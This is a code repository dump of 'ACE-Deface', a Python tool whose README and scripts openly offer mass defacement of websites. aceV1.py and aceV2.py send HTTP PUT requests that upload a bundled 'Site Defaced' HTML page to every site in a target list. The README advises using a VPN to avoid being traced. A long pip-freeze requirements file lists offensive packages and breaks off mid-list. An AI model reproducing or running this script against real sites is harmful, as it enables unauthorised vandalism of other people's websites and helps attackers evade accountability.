├── LICENSE ├── README.md ├── requirements.txt ├── run.py ├── scripts ├── __init__.py ├── colors.py └── sprint.py └── version ├── aceV1.py ├── aceV2.py ├── index.html ├── requirements.txt └── targets.txt /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 | ![ace-of-spades](https://github.com/CPScript/ACE-Deface/assets/83523587/7f4d33bb-cca9-4fe2-a6e0-8b37d176b1f2) 4 | 5 | --- 6 | 7 |
8 | 9 |
10 | 11 | **What is ACE-Deface?**
12 | ACE can deface multiple websites depending on how many you want. This script is not dangerous and i recommend using a VPN when using... This is only the file upload method
13 | 14 | **Other Languages Below**
15 |
16 | Click me! 17 |
18 | 19 | ### español | Spanish 20 | ¿Qué es ACE-Deface?
21 | ACE puede dañar varios sitios web dependiendo de cuántos desee. Este script no es peligroso y recomiendo usar una VPN cuando use... Este es solo el método de carga de archivos
22 | 23 | ### 中國人 | Chinese 24 | 什麼是 ACE-Deface?
25 | ACE 可以破壞多個網站,具體取決於您想要的數量。這個腳本並不危險,我建議使用時使用VPN...這只是檔案上傳方法
26 | 27 | ### हिंदी | Hindi 28 | एसीई-डिफेस क्या है?
29 | आप कितनी चाहते हैं इसके आधार पर ACE कई वेबसाइटों को ख़राब कर सकता है। यह स्क्रिप्ट खतरनाक नहीं है और मैं इसका उपयोग करते समय वीपीएन का उपयोग करने की सलाह देता हूं... यह केवल फ़ाइल अपलोड विधि है
30 | 31 | ### Русский | Russian 32 | Что такое ACE-Deface?
33 | ACE может испортить несколько веб-сайтов в зависимости от того, сколько вы хотите. Этот скрипт не опасен, и я рекомендую использовать VPN при использовании... Это только метод загрузки файлов
34 | 35 |
36 | 37 | --- 38 |
39 | 40 |
41 | 42 | ## screnshot: 43 | 44 | 45 |
46 | 47 | 48 | --- 49 |
50 | 51 | ### How to use: 52 | **First:** 53 | * Add site(s) to 'target.txt' 54 | * Add your Deface '.html' Script or use the Built in script 'Index.html' 55 | 56 | **Then Install** 57 | 58 | Termux: 59 | * `pkg install python2` 60 | * `pkg install git` 61 | * `git clone https://github.com/CPScript/ACE-Deface` 62 | * `pip2 install -r requirements.txt` 63 | * `cd ACE-Deface` 64 | * `python2 run.py` 65 | 66 | Linux: 67 | * `apt-get install python` 68 | * `apt-get install git` 69 | * `git clone https://github.com/CPScript/ACE-Deface` 70 | * `pip install -r requirements.txt` 71 | * `cd ACE-Deface` 72 | * `python run.py` 73 | 74 | Lastly: 75 | * Choose Version | V1/V2 76 | * Choose Deface script | Default: 'Index.html' 77 | 78 | **Note:** Please use VPN if your not running this in a emulator/VM 79 | 80 | | By: CPScript 81 | 82 |
83 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | -------------------------------------------------------------------------------- /run.py: -------------------------------------------------------------------------------- 1 | from subprocess import call 2 | import time 3 | import os 4 | from os import system 5 | os.system('clear') 6 | 7 | # welcome 8 | print("Welcome to Ace. Your personal Web Defacer") 9 | time.sleep(1) 10 | print("Please use a VPN for your safety") 11 | time.sleep(5) 12 | time.sleep(0.5) 13 | os.system('clear') 14 | 15 | # selection 16 | print("To get started please select a version of Ace:") 17 | print("1 > Ace Version 1") 18 | print("2 > Ace Version 2") 19 | print(" ") 20 | 21 | choice = input("") 22 | 23 | 24 | if choice == "1": 25 | time.sleep(1) 26 | print("You have selected AceV1") 27 | print("Loading...") 28 | time.sleep(2) 29 | os.system('clear') 30 | os.system('python version/aceV1.py') 31 | 32 | if choice == "2": 33 | time.sleep(1) 34 | print("You have selected AceV2") 35 | print("Loading...") 36 | time.sleep(2) 37 | os.system('clear') 38 | os.system('python version/aceV2.py') 39 | -------------------------------------------------------------------------------- /scripts/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scripts/colors.py: -------------------------------------------------------------------------------- 1 | import random 2 | import os 3 | 4 | try: 5 | from colorama import Style, Fore 6 | 7 | except ModuleNotFoundError: 8 | os.system("pip install colorama") 9 | 10 | all_col= [Style.BRIGHT+Fore.RED,Style.BRIGHT+Fore.CYAN,Style.BRIGHT+Fore.LIGHTCYAN_EX, Style.BRIGHT+Fore.LIGHTBLUE_EX, Style.BRIGHT+Fore.LIGHTCYAN_EX,Style.BRIGHT+Fore.LIGHTMAGENTA_EX,Style.BRIGHT+Fore.LIGHTYELLOW_EX] 11 | 12 | ran = random.choice(all_col) 13 | 14 | lg = Style.BRIGHT+Fore.LIGHTGREEN_EX 15 | g = Style.BRIGHT+Fore.GREEN 16 | lc = Style.BRIGHT+Fore.LIGHTCYAN_EX 17 | c = Style.BRIGHT+Fore.CYAN 18 | ly = Style.BRIGHT+Fore.LIGHTYELLOW_EX 19 | y = Style.BRIGHT+Fore.YELLOW 20 | r = Style.BRIGHT+Fore.RED 21 | lr = Style.BRIGHT+Fore.LIGHTRED_EX 22 | -------------------------------------------------------------------------------- /scripts/sprint.py: -------------------------------------------------------------------------------- 1 | import random 2 | import os 3 | 4 | try: 5 | from colorama import Style, Fore 6 | 7 | except ModuleNotFoundError: 8 | os.system("pip install colorama") 9 | 10 | all_col= [Style.BRIGHT+Fore.RED,Style.BRIGHT+Fore.CYAN,Style.BRIGHT+Fore.LIGHTCYAN_EX, Style.BRIGHT+Fore.LIGHTBLUE_EX, Style.BRIGHT+Fore.LIGHTCYAN_EX,Style.BRIGHT+Fore.LIGHTMAGENTA_EX,Style.BRIGHT+Fore.LIGHTYELLOW_EX] 11 | 12 | ran = random.choice(all_col) 13 | 14 | lg = Style.BRIGHT+Fore.LIGHTGREEN_EX 15 | g = Style.BRIGHT+Fore.GREEN 16 | lc = Style.BRIGHT+Fore.LIGHTCYAN_EX 17 | c = Style.BRIGHT+Fore.CYAN 18 | ly = Style.BRIGHT+Fore.LIGHTYELLOW_EX 19 | y = Style.BRIGHT+Fore.YELLOW 20 | r = Style.BRIGHT+Fore.RED 21 | lr = Style.BRIGHT+Fore.LIGHTRED_EX 22 | -------------------------------------------------------------------------------- /version/aceV1.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | 3 | import requests 4 | import os.path 5 | import sys 6 | 7 | 8 | banner = """ 9 | __ 10 |        / >  フ 11 |      |  _  _ l Author : Disease (CPScript) 12 |       /` ミ_xノ Date : 8-18-2023 13 |      /      | Tools : ACE-Deface V.1 14 |     /  ヽ   ノ Note : Please use VPN! 15 |     │  | | | 16 |  / ̄|   | | | 17 |  | ( ̄ヽ_ヽ)__) 18 |   \二つ 19 | """ 20 | 21 | b = '\033[31m' 22 | h = '\033[32m' 23 | m = '\033[00m' 24 | 25 | def x(tetew): 26 | ipt = '' 27 | if sys.version_info.major > 2: 28 | ipt = input(tetew) 29 | else: 30 | ipt = raw_input(tetew) 31 | 32 | return str(ipt) 33 | 34 | def ace(script,target_file="version/targets.txt"): 35 | op = open(script,"r").read() 36 | with open(target_file, "r") as target: 37 | target = target.readlines() 38 | s = requests.Session() 39 | print("uploading to %d website"%(len(target))) 40 | for web in target: 41 | try: 42 | site = web.strip() 43 | if site.startswith("http://") is False: 44 | site = "http://" + site 45 | req = s.put(site+"/"+script,data=op) 46 | if req.status_code < 200 or req.status_code >= 250: 47 | print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script)) 48 | else: 49 | print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script)) 50 | 51 | except requests.exceptions.RequestException: 52 | continue 53 | except KeyboardInterrupt: 54 | print; exit() 55 | 56 | def main(__bn__): 57 | print(__bn__) 58 | while True: 59 | try: 60 | a = x("Enter your deface script (Type 'version/index.html' for the built in script!): ") 61 | if not os.path.isfile(a): 62 | print("file '%s' not found"%(a)) 63 | continue 64 | else: 65 | break 66 | except KeyboardInterrupt: 67 | print; exit() 68 | 69 | ace(a) 70 | 71 | if __name__ == "__main__": 72 | main(banner) 73 | -------------------------------------------------------------------------------- /version/aceV2.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | try: 3 | import os 4 | import sys 5 | import time 6 | import random 7 | import os.path 8 | import requests 9 | import threading 10 | except ImportError: 11 | exit("install requests and try again ...(pip install requests") 12 | os.system("git pull") 13 | os.system("clear") 14 | red = "\033[31m" 15 | blue = "\033[34m" 16 | bold = "\033[1m" 17 | reset = "\033[0m" 18 | green = "\033[32m" 19 | yellow = "\033[33m" 20 | colors = [ 21 | "\033[38;5;226m", 22 | "\033[38;5;227m", 23 | "\033[38;5;229m", 24 | "\033[38;5;230m", 25 | "\033[38;5;190m", 26 | "\033[38;5;191m", 27 | "\033[38;5;220m", 28 | "\033[38;5;221m", 29 | "\033[38;5;142m", 30 | "\033[38;5;214m", 31 | ] 32 | color1, color2, color3, color4, color5 = random.sample(colors, 5) 33 | banner = f""" 34 | 35 | ___ 36 | / > フ 37 | / _ _| Author : Disease (CPScript) 38 | /` ミ_x/ Date : 8-18-2023 39 | _// | Tools : ACE-Deface V.2 40 | / ヽ ノ Note : Please use VPN! 41 | │ | | | 42 | / ̄\ | | | 43 | | ( ̄ヽ_ヽ)_) 44 | \二つ 45 | 46 | 47 | 48 | """+reset+red 49 | def animate(): 50 | text = "Uploading script to websites..." 51 | while True: 52 | for i in range(len(text)): 53 | print(text[:i] + "♤" + text[i+1:], end="\r") 54 | time.sleep(0.5) 55 | def eagle(tetew): 56 | ipt = '' 57 | if sys.version_info.major > 2: 58 | ipt = input(tetew) 59 | else: 60 | ipt = raw_input(tetew) 61 | return str(ipt) 62 | def white(script, target_file="version/targets.txt"): 63 | op = open(script, "r").read() 64 | with open(target_file, "r") as target: 65 | target = target.readlines() 66 | s = requests.Session() 67 | print(" ") 68 | print(red+bold+"[♤]\033[0m \033[34mUploading to %d website..." % (len(target)), end="", flush=True) 69 | print(" ") 70 | 71 | t = threading.Thread(target=animate) 72 | t.daemon = True 73 | t.start() 74 | for web in target: 75 | try: 76 | site = web.strip() 77 | if site.startswith("http://") is False: 78 | site = "http://" + site 79 | req = s.put(site + "/index.html", data=op) 80 | if req.status_code < 200 or req.status_code >= 250: 81 | print(red + "[" + bold + " FAILED [X]\033[0m " + red + " ] %s/%s" % (site, script)) 82 | else: 83 | print(green + "[" + bold + " SUCCESS [✓]\033[0m" + green + " ] %s/%s" % (site, script)) 84 | except requests.exceptions.RequestException: 85 | continue 86 | except KeyboardInterrupt: 87 | print; 88 | exit() 89 | def main(__bn__): 90 | print(__bn__) 91 | while True: 92 | try: 93 | print(yellow+'Please use cautiously!'+reset+red) 94 | print(' ') 95 | a = eagle(red+"♤ace♤\033[0m \033[34mEnter your deface script's name \033[33m[Type 'version/index.html' For the built in script!]\033[0m \033[34m> ") 96 | if not os.path.isfile(a): 97 | print(' ') 98 | print(red+bold+" file '%s' not found in this folder!"%(a)) 99 | print(" ") 100 | continue 101 | else: 102 | break 103 | except KeyboardInterrupt: 104 | print; exit() 105 | white(a) 106 | if __name__ == "__main__": 107 | main(banner) 108 | -------------------------------------------------------------------------------- /version/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Site Defaced using ACE 8 | 33 | 63 | 64 | 65 | 66 |
67 | Image 69 |
70 |
71 |

"Site Defaced"

72 |
73 | 74 | 93 | 94 | 95 | 96 | -------------------------------------------------------------------------------- /version/requirements.txt: -------------------------------------------------------------------------------- 1 | aardwolf==0.2.0 2 | about-time==4.2.1 3 | adblockparser==0.7 4 | AdvancedHTTPServer==2.2.0 5 | aiocmd==0.1.2 6 | aioconsole==0.3.1 7 | aiodns==3.0.0 8 | aiofiles==22.1.0 9 | aiohttp==3.8.3 10 | aiomultiprocess==0.9.0 11 | aioredis==1.3.1 12 | aiosignal==1.3.1 13 | aiosmb==0.2.50 14 | aiosqlite==0.17.0 15 | aiowinreg==0.0.7 16 | ajpy==0.0.4 17 | alabaster==0.7.12 18 | alembic==1.8.1.dev0 19 | alive-progress==3.0.1 20 | altgraph==0.17.3 21 | aniso8601==9.0.1 22 | anyio==3.6.2 23 | apispec==5.2.2 24 | apispec-webframeworks==0.5.2 25 | appdirs==1.4.4 26 | APScheduler==3.6.3 27 | arc4==0.3.0 28 | arjun==2.2.1 29 | arrow==1.2.3 30 | asciitree==0.3.3 31 | asgiref==3.6.0 32 | asn1crypto==1.5.1 33 | asn1tools==0.164.0 34 | asttokens==2.2.1 35 | asyauth==0.0.9 36 | async-generator==1.10 37 | async-timeout==4.0.2 38 | asysocks==0.2.2 39 | attrs==22.2.0 40 | autobahn==22.7.1 41 | autocommand==2.2.2 42 | Automat==22.10.0 43 | Babel==2.10.3 44 | backcall==0.2.0 45 | backoff==2.2.1 46 | base58==1.0.3 47 | bcrypt==3.2.2 48 | beautifulsoup4==4.11.1 49 | beniget==0.4.1 50 | bidict==0.21.3 51 | binwalk==2.3.3 52 | bitstruct==8.15.1 53 | bleach==5.0.1 54 | blinker==1.5 55 | bluepy==1.3.0 56 | boltons==21.0.0 57 | bopscrk==2.4.5 58 | bottle==0.12.23 59 | Bottleneck==1.3.5 60 | Brlapi==0.8.4 61 | Brotli==1.0.9 62 | bruter==0.0.2 63 | bs4==0.0.1 64 | cachetools==4.2.2 65 | catfish==4.16.4 66 | cbor==1.0.0 67 | censys==2.1.8 68 | certifi==2022.9.24 69 | cffi==1.15.1 70 | chardet==5.1.0 71 | charset-normalizer==3.0.1 72 | cheroot==9.0.0+ds1 73 | CherryPy==18.8.0 74 | cherrypy-cors==1.6 75 | ci-info==0.3.0 76 | cli-helpers==2.3.0 77 | click==8.1.3 78 | click-plugins==1.1.1 79 | cmd2==2.4.2+ds 80 | colorama==0.4.6 81 | commonmark==0.9.1 82 | configobj==5.1.0.dev0 83 | configparser==5.3.0 84 | constantly==15.1.0 85 | contourpy==1.0.7 86 | crackmapexec==5.4.0 87 | crypto==1.4.1 88 | cryptography==38.0.4 89 | cryptography37==37.0.2 90 | cssselect==1.2.0 91 | cvss==2.4 92 | cx-Freeze==6.14.1 93 | cycler==0.11.0 94 | Cython==0.29.32 95 | dbus-python==1.3.2 96 | debtags==2.1 97 | decorator==5.1.1 98 | defusedxml==0.7.1 99 | Deprecated==1.2.13 100 | deprecation==2.1.0 101 | dicttoxml==1.7.15 102 | diskcache==5.4.0 103 | distlib==0.3.6 104 | distro==1.8.0 105 | Django==3.2.16 106 | dnslib==0.9.23 107 | dnspython==2.2.1 108 | docopt==0.6.2 109 | docutils==0.17.1 110 | donut-shellcode==0.9.3 111 | dropbox==11.34.0 112 | dsinternals==1.2.4 113 | ecdsa==0.18.0 114 | email-validator==1.3.0 115 | et-xmlfile==1.0.1 116 | etelemetry==0.3.0 117 | exceptiongroup==1.1.0 118 | executing==1.2.0 119 | ExifRead==3.0.0 120 | fade==0.0.9 121 | fake-useragent==1.1.1 122 | faraday-agent-dispatcher==2.4.0 123 | faraday-agent-parameters-types==1.2.0 124 | faraday-cli==2.1.8 125 | faraday-plugins==1.8.1 126 | faradaysec==4.3.2 127 | fastapi==0.109.1 128 | feedparser==6.0.10 129 | fierce==1.5.0 130 | filedepot==0.5.2 131 | filelock==3.9.0 132 | filteralchemy==0.1.0 133 | fitz==0.0.1.dev2 134 | flasgger==0.9.5 135 | Flask==2.2.2 136 | Flask-Classful==0.15.0.dev1 137 | Flask-KVSession-fork==0.6.4 138 | Flask-Limiter==3.1.0 139 | Flask-Login==0.6.2 140 | Flask-Mail==0.9.1 141 | Flask-Principal==0.4.0 142 | Flask-RESTful==0.3.9 143 | Flask-Security-Too==4.0.0 144 | Flask-SocketIO==5.3.0 145 | Flask-SQLAlchemy==3.0.2 146 | Flask-WTF==1.1.1 147 | flatbuffers==2.0.8+dfsg1.2 148 | fonttools==4.38.0 149 | frontend==0.0.3 150 | frozenlist==1.3.3 151 | fs==2.4.16 152 | future==0.18.2 153 | gast==0.5.2 154 | GDAL==3.6.2 155 | geoip2==2.9.0 156 | geojson==2.5.0 157 | gitdb==4.0.9 158 | GitPython==3.1.37 159 | gpg==1.18.0 160 | grapheme==0.6.0 161 | graphene==2.1.9 162 | graphene-sqlalchemy==2.1.2 163 | graphql-core==2.2.1 164 | graphql-relay==2.0.1 165 | greenlet==2.0.1 166 | h11==0.14.0 167 | h2==4.1.0 168 | hashID==3.1.4 169 | hiredis==1.0.1 170 | hpack==4.0.0 171 | html2text==2020.1.16 172 | html5lib==1.1 173 | httpagentparser==1.9.1 174 | httpcore==0.16.3 175 | httplib2==0.21.0 176 | httpx==0.23.3 177 | humanize==0.0.0 178 | hupper==1.10.3 179 | hyperframe==6.0.0 180 | hyperlink==21.0.0 181 | icalendar==4.0.3 182 | idna==3.3 183 | imagesize==1.4.1 184 | impacket==0.10.0 185 | importlib-metadata==4.12.0 186 | incremental==21.3.0 187 | inflect==2.1.0 188 | iniconfig==1.1.1 189 | invoke==1.7.0 190 | ipwhois==0.15.1 191 | IPy==1.1 192 | ipython==8.5.0 193 | isodate==0.6.1 194 | itsdangerous==2.1.2 195 | jaraco.classes==3.2.1 196 | jaraco.collections==3.8.0 197 | jaraco.context==4.2.0 198 | jaraco.functools==3.5.0 199 | jaraco.text==3.11.0 200 | jdcal==1.0 201 | jedi==0.18.2 202 | Jinja2==3.0.3 203 | jq==1.2.1 204 | jsonpointer==2.3 205 | jsonschema==4.9.1 206 | kaitaistruct==0.10 207 | kali-tweaks==2023.1.2 208 | KismetCaptureBtGeiger==2021.7.1 209 | KismetCaptureFreaklabsZigbee==2018.7.0 210 | KismetCaptureRtl433==2020.10.1 211 | KismetCaptureRtladsb==2020.10.1 212 | KismetCaptureRtlamr==2020.10.1 213 | kiwisolver==0.0.0 214 | ldap3==2.9.1 215 | ldapdomaindump==0.9.3 216 | lib==4.0.0 217 | lightdm-gtk-greeter-settings==1.2.2 218 | limits==2.8.0 219 | log-symbols==0.0.14 220 | looseversion==1.0.2 221 | louis==3.24.0 222 | lsassy==3.1.1 223 | lxml==4.9.2 224 | lz4==4.0.2+dfsg 225 | macholib==1.16.2 226 | Mako==1.2.4.dev0 227 | Markdown==3.4.1 228 | MarkupSafe==2.1.1 229 | marshmallow==3.18.0 230 | marshmallow-sqlalchemy==0.28.1 231 | masky==0.1.1 232 | matplotlib==3.6.3 233 | matplotlib-inline==0.1.6 234 | maxminddb==2.1.0 235 | mechanize==0.4.8 236 | minidump==0.0.21 237 | minikerberos==0.2.14 238 | mistune0==0.8.4 239 | mitmproxy==8.1.1 240 | mnemonic==0.19 241 | more-itertools==8.10.0 242 | mpmath==0.0.0 243 | msgpack==1.0.3 244 | msldap==0.4.7 245 | multidict==6.0.4 246 | mysqlclient==1.4.6 247 | Naked==0.1.32 248 | nassl==4.0.2 249 | neo4j==5.2.dev0 250 | neobolt==1.7.17 251 | neotime==1.7.4 252 | netaddr==0.8.0 253 | netifaces==0.11.0 254 | networkx==2.8.8 255 | nibabel==4.0.2 256 | nipype==1.8.5 257 | notus-scanner==22.4.1 258 | nplusone==1.0.0 259 | ntpsec==1.2.2 260 | Nuitka==1.4 261 | numexpr==2.8.4 262 | numpy==1.23.5 263 | odfpy==1.4.2 264 | olefile==0.46 265 | onboard==1.4.1 266 | openai==0.26.5 267 | openpyxl==3.0.9 268 | ordered-set==4.1.0 269 | oscrypto==1.3.0 270 | ospd-openvas==22.4.0 271 | outcome==1.2.0 272 | packaging==22.0 273 | paho-mqtt==1.5.1 274 | pandas==1.3.5 275 | paramiko==2.12.0 276 | parse==1.19.0 277 | parso==0.8.3 278 | passlib==1.7.4 279 | Paste==3.5.2 280 | PasteDeploy==3.0.1 281 | PasteScript==3.2.1 282 | patator==0.9 283 | patchelf==0.17.2.0 284 | pathlib==1.0.1 285 | pcapy==0.11.5.dev0 286 | pefile==2022.5.30 287 | pendulum==2.1.2 288 | pexpect==4.8.0 289 | pgcli==3.5.0 290 | pgspecial==2.0.1 291 | phonenumbers==8.12.57 292 | pickleshare==0.7.5 293 | pikepdf==6.2.6 294 | Pillow==10.2.0 295 | plaster==1.0 296 | plaster-pastedeploy==0.5 297 | platformdirs==2.6.0 298 | pluggy==1.0.0+repack 299 | pluginbase==1.0.1 300 | ply==3.11 301 | portend==3.1.0 302 | prettytable==3.6.0 303 | promise==2.3 304 | prompt-toolkit==3.0.36 305 | protobuf==4.21.12 306 | prov==2.0.0 307 | psutil==5.9.4 308 | psycopg==3.1.7 309 | psycopg2==2.9.4 310 | ptyprocess==0.7.0 311 | publicsuffix2==2.20191221 312 | publicsuffixlist==0.7.10 313 | pure-eval==0.0.0 314 | py==1.11.0 315 | py-sneakers==1.0.1 316 | py-ubjson==0.16.1 317 | pyaes==1.6.1 318 | pyarmor==7.7.4 319 | pyasn1==0.4.8 320 | pyasn1-modules==0.2.8 321 | pycairo==1.20.1 322 | pycares==4.1.2 323 | pycparser==2.21 324 | pycrypto==2.6.1 325 | pycryptodome==3.16.0 326 | pycryptodomex==3.11.0 327 | pycurl==7.45.2 328 | pydantic==1.10.2 329 | PyDispatcher==2.0.5 330 | pydot==1.4.2 331 | pyee==8.2.2 332 | pyExploitDb==0.2.6 333 | pyfiglet==0.8.post0 334 | pygame==2.1.2 335 | pygexf==0.2.2 336 | Pygments==2.13.0 337 | PyGObject==3.42.2 338 | pygraphviz==1.7 339 | PyHamcrest==2.0.3 340 | pyinotify==0.9.6 341 | PyInstaller==3.5+498e6ee058 342 | PyJWT==2.6.0 343 | pylnk3==0.4.2 344 | pyminifier==2.1 345 | pymssql==2.2.2 346 | PyMySQL==1.0.2 347 | PyNaCl==1.5.0 348 | PyOpenGL==3.1.6 349 | pyOpenSSL==22.1.0 350 | pyotp==2.6.0 351 | pyparsing==3.0.9 352 | PyPDF2==2.12.1 353 | pyperclip==1.8.2 354 | pypng==0.20220715.0 355 | pyppeteer==1.0.1 356 | pypsrp==0.5.0 357 | pypykatz==0.4.9 358 | PyQRCode==1.2.1 359 | 